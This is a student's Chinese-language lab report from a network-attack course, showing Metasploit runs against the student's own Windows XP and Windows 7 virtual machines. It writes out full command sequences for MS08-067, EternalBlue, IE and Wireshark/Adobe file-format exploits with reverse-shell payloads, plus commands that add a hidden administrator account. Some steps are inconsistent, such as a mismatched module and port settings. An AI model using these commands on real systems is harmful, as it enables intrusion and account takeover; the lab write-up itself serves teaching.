码迷,mamicode.com
首页 > 其他好文 > 详细

2019-2020-2 20175227张雪莹《网络对抗技术》Exp6 MSF基础应用

时间:2020-04-26 15:24:00      阅读:96      评论:0      收藏:0      [点我收藏+]

标签:后门   自己   nis   调用   ip地址   ssi   应该   alt   gear   

目录

基础知识

MSF的渗透模块

  • 进入MSF控制台后,用show exploits查看所有渗透模块,如下:

技术图片

  • 也可以进入/usr/share/metasploit-framework/modules查看模块源码目录,它们有6个:
    • 渗透攻击模块(Exploit Modules)
    • 辅助模块(Auxiliary Modules)
    • 攻击载荷(Payload Modules)
    • 空字段模块(Nop Modules)
    • 编码模块(Encoders)
    • 后渗透攻击模块(Post)

三个用户操作界面

  • MSF控制台:msfconsole
  • Armitage
    • 启动服务器service postgresql start
    • 启动armitagearmitage
  • Web GUI

返回目录

实验目标

  • 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路。

实验内容

先把后面需要用到的软件安装包放这里,需要的可以自取

主动攻击的实践

ms08_067

实验环境

  • 攻击机:kali-linux-2020.1-vmware-amd64(192.168.1.17)
  • 靶机:Windows XP Professional(192.168.1.21)
  • 攻击软件:metasploit v5.0.85-dev
  • 测试靶机是否存在此漏洞:
    • 查看靶机OS版本信息,使用命令nmap -sS -A --script=smb-vuln-ms08-067 -PO 192.168.1.21

技术图片

  • 可以看到靶机有这个漏洞

技术图片

  • 打开MSF控制台之后,用命令search m08-067查看漏洞的具体模块位置:

技术图片

  • 可以看到是exploit/windows/smb/ms08_067_netapi
  • 使用如下命令对靶机进行攻击:
use exploit/windows/smb/ms08_067_netapi //选择攻击模块
show payloads   //查看攻击载荷

技术图片

show options //查看配置信息 默认端口是445
show targets //查看可攻击的平台

技术图片

技术图片

set RHOST 192.168.1.21 //设置靶机IP,端口默认为445
set LPORT 5227 //成功后回连主机端口5330
set LHOST 192.168.1.17 //设置攻击机IP
set target 34 //这里为Windows XP SP3 Chinese - Simplified (NX)
exploit //发起渗透攻击
  • 攻击成功!

技术图片

返回目录

ms17_010_eternalblue

实验环境

  • 攻击机:kali-linux-2020.1-vmware-amd64(192.168.1.17)
  • 靶机:Windows 7(192.168.1.19)因为该漏洞靶机只有win7所以就换了
  • 攻击软件:metasploit v5.0.85-dev

技术图片

过程跟前一个差不多,我这里简写了

  • 步骤如下:
nmap -sS -A --script=smb-vuln-ms17-010 -PO 192.168.1.21
search ms17_010 platform:windows  //搜索Win下的该漏洞所处模块
show payloads    //显示可用载荷
set payload generic/shell_reverse_tcp  
set RHOST 192.168.1.19 //设置靶机IP,端口默认为445
set LPORT 5227 //成功后回连主机端口5330
set LHOST 192.168.1.17 //设置攻击机IP
exploit //发起渗透攻击

技术图片

  • 攻击成功!

自己尝试创了一个文件夹并成功:

技术图片

技术图片

返回目录

攻击浏览器的实践

ms11_050

实验环境

  • 攻击机:kali-linux-2020.1-vmware-amd64(192.168.1.17)
  • 靶机:Windows 7+IE 8(192.168.1.19)因为该漏洞靶机只有win7所以就换了
  • 攻击软件:metasploit v5.0.85-dev
  • 操作步骤:
use exploit/windows/smb/ms17_010_eternalblue   //进入该模块
show payloads    //显示可用载荷
set payload generic/shell_reverse_tcp  
set RHOST 192.168.1.19 //设置靶机IP,端口默认为445
set LPORT 5227 //成功后回连主机端口5330
set LHOST 192.168.1.17 //设置攻击机IP
exploit //发起渗透攻击

技术图片

  • 在靶机浏览器输入https://攻击机IP:监听端口

技术图片

  • 攻击成功!我创了一个AttackSuccess文件夹

技术图片

技术图片

返回目录

ms14_064

实验环境

  • 攻击机:kali-linux-2020.1-vmware-amd64(192.168.99.116)
  • 靶机:Windows XP Professional +IE 8(192.168.99.227)
  • 攻击软件:metasploit v5.0.85-dev
  • 操作步骤:
search ms14_064     //搜索该漏洞存在的模块
use exploit/windows/browser/ms14_064_ole_code_execution //选择攻击模块
info //查看漏洞相关信息(发现可攻击winXP和win7)
show payloads //显示可用攻击载荷
set payload windows/meterpreter/reverse_tcp //设置tcp反向连接
set SRVHOST 192.168.99.116 //设置攻方IP
set LHOST 192.168.99.116
set LPORT 5227
exploit //发起攻击
  • 将提示中第四行的URL输入至靶机IE浏览器中,之后可以看到已经成功建立了会话一:

技术图片

  • 输入sessions -i 1即可选择第一个会话,调用shell权限成功,ipconfig后,我们确认靶机IP就是攻击目标192.168.99.227

技术图片

  • 我们在靶机上试着创一个新用户
net user   //查看当前用户信息
net user zxy 1234 /add   //添加用户名zxy,密码1234的账户
//进入C://WINDOWS/system32
net localgroup administrators zxy /add   //对该账户进行提权

技术图片

技术图片

  • 可以用该账户进行登录

技术图片

返回目录

攻击客户端的实践

wireshark

实验环境

  • 攻击机:kali-linux-2020.1-vmware-amd64(192.168.1.17)
  • 靶机:Windows XP Professional +Wireshark 1.4.0(192.168.1.21)
  • 攻击软件:metasploit v5.0.85-dev
  • 我们还可以通过刚刚那个渗透攻击,继续查看靶机桌面上有啥应用软件可以攻击,一看有个Wireshark,好的我们来看看Metasploit里面有没有相关攻击模块
    技术图片

  • /usr/share/metasploit-framework/modules/exploits/windows/fileformat进入该目录,ls查看——有针对Wireshark的攻击,我们来试试

技术图片

  • search一下,我选用exploit/windows/fileformat/wireshark_packet_dect这个模块,info 查看一下详情

技术图片

  • 查看下我的XP的版本信息,没有标明是64位的,那应该是32位的。wiresharkz正好是1.4.2<1.4.4

技术图片
技术图片

  • 接下来我们试着攻击一下
set payload windows/meterpreter/reverse_tcp //设置tcp反向连接
show options   //查看设置项
set LHOST 192.168.1.17 //kali IP
set LPORT 5227 //设置攻击端口
set FILENAME zxy.pcap //设置生成的pcap文件名
exploit //发起攻击

技术图片

  • /root/.msf4/local/中的zxy.pcap拷到靶机里面
  • 在MSF控制台中
use exploit/multi/handler //进入监听模块
set payload windows/meterpreter/reverse_tcp //设置tcp反向连接
set LHOST 192.168.1.17 //kali IP
set LPORT 5330 //设置攻击端口
exploit //监听
  • 在靶机中打开该文件,发现Kali中成功获取了shell,攻击成功!

技术图片

返回目录

Adobe Reader

实验环境

  • 攻击机:kali-linux-2020.1-vmware-amd64(192.168.1.17)
  • 靶机:Windows XP Professional +Adobe Reader 9.3.0(192.168.1.21)
  • 攻击软件:metasploit v5.0.85-dev
  • 靶机是一个裸机,除了装了wireshark就没啥了,看了/usr/share/metasploit-framework/modules/exploits/windows/fileformat,还有针对Adobe的,那我就试一下吧

  • 步骤

search adobe //进行查找adobe相关的攻击模块
use windows/fileformat/adobe_cooltype_sing  //使用该漏洞
info //查看漏洞具体信息
set payload windows/meterpreter/reverse_tcp //选择攻击载荷
show options //查看详细信息
set LPORT 5227 //设置端口号
set LHOST 192.168.1.21 //设置攻击机IP地址
exploit //攻击

技术图片

  • back退出当前模块
use exploit/multi/handler //进入监听模块
set payload windows/meterpreter/reverse_tcp  //选择攻击载荷
set LHOST 192.168.1.21 //设置攻击机IP地址
set LPORT 5227 //设置端口号
exploit //攻击
  • 靶机中打开pdf文件,kali中可以发现攻击成功!

技术图片

返回目录

成功应用任何一个辅助模块

  • 进入图中辅助模块文件夹,查看具体有哪些子模块,看见有一个sniffer(嗅探),我们在msfconsole中搜索一下

技术图片

  • 我们选用auxiliary/sniffer/psnuffle

技术图片

  • show options查看设置项

技术图片

  • SNAPLEN 65535捕包长度是65535字节,是最大的了,协议项设的是全部,应该啥都可以捕到。其他就不用设置什么了。
  • exploit启动一下:

技术图片

  • XP中打开浏览器进入下百度,发现kali中都记录到了。

返回目录

老师提问

用自己的话解释什么是exploit,payload,encode?

  • 回答:
    • exploit:就是渗透攻击。这个模块下面有针对各种平台各种软件下的漏洞开发的渗透攻击子模块,用户可以调用某一个对靶机进行攻击。
    • payload:就是载荷。比如一个后门,通过什么平台下的基于什么软件的连接方式,可以通过此项来设置。
    • encode:就是一个编码器,把比如shellcode存在一些特征码,本来容易被靶机安全软件所察觉,用了这个编码器中的编码后就打乱了特征码,从而迷惑靶机。

返回目录

所遇到的问题及其解决方法


(基本没遇到啥问题,攻击不成功通常都是漏洞和靶机系统或软件版本不匹配,注意查看攻击模块的靶机信息,换个匹配系统就好了。)

返回目录

实验感想

  • 通过做这次实验,发现其实漏洞的年限都比较久远了,所攻击的系统也很久远,XP,win7都停服了。但这并不意味着现在用的最新系统就没有漏洞就不会有人攻击,我自己还尝试着攻击了一下自己的安卓手机,发现安装后门的时候手机只会提示,并不会阻拦,手机轻轻松松就被人攻破了。这次实验收获是很大的。

返回目录

参考资料

返回目录

2019-2020-2 20175227张雪莹《网络对抗技术》Exp6 MSF基础应用

标签:后门   自己   nis   调用   ip地址   ssi   应该   alt   gear   

原文地址:https://www.cnblogs.com/zxy20175227/p/12779696.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!